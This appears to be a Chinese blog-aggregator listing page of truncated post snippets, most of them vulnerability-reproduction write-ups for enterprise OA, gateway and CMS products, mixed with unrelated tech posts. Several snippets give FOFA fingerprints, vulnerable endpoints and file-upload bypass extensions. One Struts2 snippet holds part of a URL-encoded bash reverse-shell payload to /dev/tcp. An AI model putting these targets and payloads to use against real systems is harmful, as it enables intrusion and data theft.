网安漏洞复现

封装倒计时函数

1.js封装部分//封装倒计时逻辑函数import{computed,onUnmounted,ref}from'vue';//这里要使用npminstalldayjs安装也可以查看官网安装importdayjsfrom'dayjs
Pinia_0819·2024-01-11 02:23

浙大恩特客户资源管理系统 CrmBasicAction.entcrm任意文件上传

资产测绘title=“欢迎使用浙大恩特客户资源管理系统”漏洞复现POC如下:POS
keepb1ue·2024-01-10 23:28

世邦通信SPON IP网络对讲广播系统未授权访问

资产测绘icon_hash=“-1830859634”漏洞复现POST/php/getuserdata.php
keepb1ue·2024-01-10 23:58

世邦通信 SPON IP网络对讲广播系统后门账户

资产测绘icon_hash=“-1830859634”漏洞复现代码中可以看到,可以看到有固定写死的账户密码(脑子抽了一下。
keepb1ue·2024-01-10 23:57

Sectigo证书介绍

公司致力于为企业、个人和互联网安全提供创新的保护服务。2.证书种类-DV证书(DomainValidation):-特点:验证域名的合法性,适用于个人网站和小型企业。
JOYSSL3000·2024-01-10 23:02

Php&&Python&&C++圆类的实现(OOP)

~),而且最近学的信息收集和ctf感觉好像没找到啥能更的(不过最经还是在考虑更一下CTF的密码学的)然后就被催更了@_#蒽但是天还是无绝人之路的,他丢了一道面向对象的题目给我,好家伙还要用c艹来写好险网安还是教了
[email protected]·2024-01-10 23:29

漏洞复现】锐捷RG-UAC统一上网行为管理系统信息泄露漏洞

Nx01产品简介锐捷网络成立于2000年1月,原名实达网络,2003年更名,自成立以来,一直扎根行业,深入场景进行解决方案设计和创新,并利用云计算、SDN、移动互联、大数据、物联网、AI等新技术为各行业用户提供场景化的数字解决方案,助力全行业数字化转型升级。Nx02漏洞描述锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证
晚风不及你ღ·2024-01-10 22:10

漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞

Nx01产品简介锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。Nx02漏洞描述锐捷EG易网关cli.php存在后台命令执行漏洞,此漏洞需要权限,可搭配login.php命令执行漏洞获取登陆密码结合使用。Nx03产
晚风不及你ღ·2024-01-10 22:37

宏景eHR fileDownLoad SQL注入漏洞复现

eHRfileDownLoad接口处存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息0x03复现环境FOFA:app="HJSOFT-HCM"0x04漏洞复现
OidBoy_G·2024-01-10 22:24

蓝凌EIS智慧协同平台 ShowUserInfo.aspx SQL注入漏洞复现

0x01产品简介蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。0x02漏洞概述由于蓝凌EIS智慧协同平台ShowUserInfo.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。0x03复现环境FOFA:app="La
OidBoy_G·2024-01-10 22:23

用友移动管理系统 多处文件上传漏洞复现

0x01产品简介用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。0x02漏洞概述用友移动管理系统/maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意
OidBoy_G·2024-01-10 22:53

仿蓝奏云网盘 /file/list SQL注入漏洞复现

0x01产品简介仿蓝奏网盘是一种类似于百度网盘的文件存储和共享解决方案。它为用户提供了一个便捷的平台,可以上传、存储和分享各种类型的文件,方便用户在不同设备之间进行文件传输和访问。0x02漏洞概述仿蓝奏云网盘/file/list接口处存在SQL注入漏洞,登录后台的攻击者可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,
OidBoy_G·2024-01-10 22:22

了解CTF。拿下CTF,什么是CTF夺旗赛?

互联网安全从其本质上来讲就是互联网上的`信息安全`。从广义来说,凡是涉及到互联网上`信息的保密性、完整性、可用性、真实性和可控性`的相关技术和理论都是
HackKong·2024-01-10 19:05

一个寒假能不能学好黑客?自学黑客到底难不难

答案是可以不过以下这几点你要注意一、学习路线可能正在学网安/黑客的都知道,学校教的都是书面知识,实践很少,学的不深,如果真正想学完找一份好工作,那么我的建议是自学,当你真正入门后会发现,黑客并不是想象中的那样
HackKong·2024-01-10 19:03

[漏洞复现]Grav CMS任意代码执行漏洞(CVE-2022-2073)

一、漏洞介绍GravCMS可以通过Twig来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版v1.7.34以下的版本二、漏洞复现春秋云境.com一键梭哈开启场
free key·2024-01-10 18:52

[漏洞复现]Web Based Quiz System(CVE-2022-32991)

二、漏洞复现春秋云境.com一键梭哈,复制粘贴直接拿下开启场景“启动原神”ok,点完鼠标我们开始ctrl+c,ctrl+v这里加',会吧,不会退学吧这里加--+知道你们懒给你们打出来
free key·2024-01-10 18:52

[漏洞复现]Apache Struts2/S2-012 RCE(CVE-2013-1965)

二、漏洞复现春秋云境.com一键梭哈,复制粘贴直接拿下name=%25%7B%28%23cmd%3D%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Fip%2Fpor
free key·2024-01-10 18:52

[漏洞复现]Apache_log4j2(CVE-2021-44228)

安全公告编号:CNTA-2021-00322021年12月10日,国家信息安全漏洞共享平台(CNVD)收录了ApacheLog4j2远程代码执行漏洞(CNVD-2021-95914)。攻击者利用该漏洞,可在未授权的情况下远程执行代码。目前,漏洞利用细节已公开,Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本,同时采取防范性措施避免漏洞攻击威胁。一、漏洞情况分析Apac
free key·2024-01-10 18:22

全版本Windows RCE漏洞复现CVE-2023-36025

漏洞简介CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefenderSmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的Internet快捷方式文件(.URL)或指
网安老伯·2024-01-10 16:18

燃气管网安全运行监测预警系统-可燃气体监测设备-旭华智能

因此,建立一套完备、高效、及时的燃气管网安全运行监测预警系统具有重要意义。根据8月31日住建部发布的《关于扎实推进城市燃气管道等老化更新改造工作的通知》指出:在城市
旭华智能·2024-01-10 14:44

信息安全概论

2:信息安全保障体系Chapter-3:密码技术概述Chapter-4:对称密码技术Chapter-5:公钥密码技术Chapter-6:密钥管理Chapter-7:安全协议Chapter-8:无线局域网安
会思想的苇草i·2024-01-10 11:13

漏洞复现】锐捷EG易网关login.php命令注入漏洞

Nx01产品简介锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。Nx02漏洞描述锐捷EG易网关login.php存在CLI命令注入,导致管理员账号密码泄露漏洞。Nx03产品主页fofa-query:app="Rui
晚风不及你ღ·2024-01-10 10:05

网安入门12-文件上传(黑白名单,00截断)

黑名单绕过Pass-03有的时候后端限制了一些黑名单,比如过滤后缀名.php我们就可以用黑名单里没有的后缀名进行绕过,例如:大小写:.phP.pHp.AsPphp1.php2.php3.php9.phtml(成功率较高)特殊文件名绕过比如发送的htp包里把文件名改成test.asp.或test.asp_(下划线为空格),这种命名方式在windows系统里是不被允许的,所以需要在burp之类里进行修
挑不动·2024-01-10 09:55

OpenRASP xss算法的几种绕过方法

测试环境【网安学习资料】windows/tomcat/jdk1.8/openrasp1.3.7-beta测试环境部署参见https://w
H_00c8·2024-01-10 05:53

网安面试三十到题(结束)

121有文件上传了漏洞了,linux下怎么找xx.conf的文件目录遍历,目录扫描122反序列化漏洞原理##你要把别人序列化好的文件进行反序列化进行利用,但是在序列化的过程中,被别人注入了攻击代码、魔法函数之类的,当你反序列化的时候,这些攻击代码就被执行了123常见中间件漏洞IIS5.x-6.x解析漏洞##使用iis5.x-6.x版本的服务器,大多为windowsserver2003,网站比较古老
什么都好奇·2024-01-09 23:08

金和OA C6 upload_json 任意文件上传漏洞

资产测绘app=“Jinher-OA”漏洞复现POST/c6/KindEditor1/asp/uploa
keepb1ue·2024-01-09 21:35

世邦spon IP网络对讲广播系统任意文件上传漏洞

漏洞描述sponIP网络对讲广播系统存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限资产测绘icon_hash=“-1830859634”漏洞复现POST/upload
keepb1ue·2024-01-09 21:34

某 E-Office v9 任意文件上传【漏洞复现实战】

image一、前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。本文章中的漏洞均为公开的漏洞收集,如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。二、漏洞原理本次复现漏洞为未公开漏洞CNVD-2021-49104,该漏洞是由于e-office其上传模块中用户输入部分未能妥善处理,攻击者可以构造恶意的上传数据包
H_00c8·2024-01-09 20:31

2022年保研经验网安&华五&武大中山等

文章目录个人背景夏令营复旦四川大学中科大上海交大中山大学软件所可信计算实验室武汉大学预推免北大深圳经验&想说的话个人背景某西北211小班rk2,国奖一个,竞赛国家级1项,数模方面两个一般奖,数竞奖,论文cvccfc一作(比较水了,但是感觉还是起到了作用了)夏令营感觉网安
c1assy·2024-01-09 15:17

Linux ubunut vscode 调试 rust

前言公司sdk需要rust语言去解析,记录下代码调试过程安装过程vscode官网下载安装rust官网安装,我用的ubuntu22.04.3桌面系统,直接运行的curl--proto‘=https’--tlsv1.2
莫忘初心丶·2024-01-09 13:43

致远OA getAjaxDataServlet XXE漏洞复现(QVD-2023-30027)

0x01产品简介致远互联-OA是数字化构建企业数字化协同运营中台,面向企业各种业务场景提供一站式大数据分析解决方案的协同办公软件。0x02漏洞概述致远互联-OAgetAjaxDataServlet接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。0x03影响范围V5/G6V6.0及以上全系列版本0x04复现环境FOFA:a
OidBoy_G·2024-01-09 08:45

广联达Linkworks DataExchange.ashx XXE漏洞复现

0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述广联达LinkWorks/GB/LK/Document/DataExchange/DataExchange.ashx接口处存
OidBoy_G·2024-01-09 08:52

金和OA C6 HomeService.asmx SQL注入漏洞复现

0x01产品简介金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。0x02漏洞概述金和OAC6HomeService.asmx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步
OidBoy_G·2024-01-09 08:52

广联达Linkworks GetAuthorizeKey.ashx 文件上传漏洞复现

0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述由于广联达LinkWorks/Services/FileService/UserFiles/GetAuthorizeKey.
OidBoy_G·2024-01-09 08:22

金和OA C6 CarCardInfo.aspx SQL注入漏洞复现

0x01产品简介金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。0x02漏洞概述金和OAC6CarCardInfo.aspx接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步
OidBoy_G·2024-01-09 08:48

Mac OS下WireGuard客户端的安装与配置使用

1.安装wireguard-toolsliu-d推荐官网安装/下载地址:https://www.wireguard.com/install/参考原创:MacOS下WireGuard客户端的安装与配置最简单
Dazer007·2024-01-09 07:22

全程云OA ajax.ashx接口存在SQL注入漏洞 附POC软件

1.全程云OA简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发全程云办公自动化系统也是企事业单位的内部
sublime88·2024-01-09 05:24

金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件

1.金蝶EAS简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发金蝶EASCloud采购管理系统是专业的采购平台管理系统2.漏洞描述金蝶EAS为集团型企业提供功能全面、性能稳定、
sublime88·2024-01-09 05:53

宏电智慧排水监测项目荣获“2023中国物联领航奖”

大会期间发布了“2023年度中国物联产业领航与创新应用典范评选”,宏电股份申报的“安徽省滁州市排水管网安全运行监测项目”荣获“标杆案例奖”。
宏电物联网·2024-01-09 00:53

java 实现内网服务代理(mysql tcp请求)

恰巧有一个以前的同事说他现在工作遇到了内网安装的mysql等需要在自己家里访问的需求,他有了点想法想实现这个,聊了聊我也有了兴趣,于是周末加了个班,网上搜搜资料实现了下面的功能。
lswsmj·2024-01-08 22:24

ACL16_S 系列 低成本物联网安全芯片,可应用物联网认证、 SIM、防抄板和设备认证等产品上

ACL16_S芯片是针对物联网认证、SIM、防抄板和设备认证需求推出的高安全芯片。芯片采用32位ARMCortex™-M0系列内核,片内集成多种安全密码模块,包括RSA/ECCDES/TDES、SHA-1/-256、AES-128/-192/-256等国际安全算法,支持真随机数发生器,集成CRC16-CCITT校验模块。芯片提供了多种外围接口:SPI、UART、SWI、ISO7816、I2C等,系
深圳市青牛科技实业有限公司 小芋圆·2024-01-08 19:26

天融信TOPSEC Cookie 远程命令执行漏洞复现

声明本文仅用于技术交流,请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。一、漏洞概述天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie处存在RCE漏洞,会导致服务器失陷。二、漏洞环境搭建
故事讲予风听·2024-01-08 19:43

漏洞复现】Hikvision SPON IP网络对讲广播系统存在命令执行漏洞CVE-2023-6895

漏洞描述HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统。HikvisionIntercomBroadcastingSystem是中国海康威视(Hikvision)公司的一个对讲广播系统。HikvisionIntercomBroadcastingSystem3.0.3_20201113_RELEASE(HIK)版本存在
丢了少年失了心1·2024-01-08 18:58

漏洞复现】Hikvision SPON IP网络对讲广播系统任意文件上传

漏洞描述IP网络对讲广播系统是一种基于IP网络的高效、可靠、智能的通信解决方案。它支持全双工语音通信、单呼/多呼、组呼/广播等多种通信模式,可以实现跨地域、跨网络的实时通讯。该系统具有灵活的群组管理、智能化的调度和优先级控制功能,可以满足各种场景下的紧急通讯和协作需求。同时,系统支持多种接入设备和应用程序,具有良好的可扩展性和互操作性。免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法
丢了少年失了心1·2024-01-08 18:23

CVE-2021-21220 Chrome远程代码执行漏洞复现

0x00简介GoogleChrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以
m0_56642842·2024-01-08 16:01

网安全实战防御技术和防御产品

如何有效进行内网安全防御,还需要我们多阶梯、多纬度的结合企业内网实际环境进行考虑,针对不同攻击思路该如何部署有效的防御体系,而这需要内网安全管理员们持续不断的付出努力。
Ms08067安全实验室·2024-01-08 11:39

网安入门09-Sql注入(绕过方法梳理)

ByPassSQL注入ByPass是指攻击者通过各种手段绕过应用程序中已经实施的SQL注入防御措施,例如输入恶意数据、修改请求头等方式,绕过过滤、转义、限制等操作,从而成功地执行恶意SQL语句。攻击者使用SQL注入ByPass技术可以让应用程序的防御措施失效,使得SQL注入攻击成功。因此,防范SQL注入攻击需要采取综合的安全措施,包括正确的SQL语句编写、使用参数化查询、限制用户输入、过滤和转义特
挑不动·2024-01-08 10:51

网安入门10-文件上传(中国蚁剑)

什么是文件上传漏洞——来自GPT-4文件上传漏洞是一种常见的安全漏洞,它出现在Web应用程序中,允许攻击者上传恶意文件到服务器。这种漏洞可能导致严重的安全问题,例如服务器被入侵、数据泄露和应用程序功能受损。文件上传漏洞通常由以下几个原因导致:不充分的文件类型验证:Web应用程序应该仅允许用户上传特定类型的文件,例如图片、文档等。如果验证不严格,攻击者可能会上传恶意文件,如脚本或可执行文件。不安全的
挑不动·2024-01-08 10:18

漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)

声明本篇文章仅用于漏洞复现与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
李火火安全阁·2024-01-08 00:08

Supabase 后端服务平台 SQL注入漏洞复现

0x01产品简介Supabase是一个开源的Firebase替代品,以BaaS的形式向各种应用程序提供了一系列的后端功能,可以帮助开发者更快地构建产品。对于想快速实现一个产品而言,如果使用传统开发,又要兼顾前端开发,同时又要花费时间构建后端服务。Supabase能够让开发人员可以专注于前端开发,而无需花费大量时间和精力来构建和维护后端基础设施。Supbase产品包括Postgres数据库和身份验证
OidBoy_G·2024-01-08 00:07
上一页 10 11 12 13 14 15 16 17 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他